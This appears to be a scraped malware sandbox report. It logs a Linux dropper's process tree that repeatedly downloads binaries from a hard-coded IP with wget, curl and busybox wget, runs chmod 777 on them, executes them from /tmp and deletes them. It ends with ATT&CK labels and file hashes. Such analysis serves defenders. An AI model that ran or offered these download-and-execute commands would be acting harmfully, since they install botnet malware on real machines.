/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:942
-
-
/bin/chmodchmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:948
-
-
/bin/chmodchmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:954
-
-
/bin/chmodchmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:960
-
-
/bin/chmodchmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:966
-
-
/bin/chmodchmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:972
-
-
/bin/chmodchmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:978
-
-
/bin/chmodchmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:981
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:982
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:984
-
-
/bin/chmodchmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:987
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97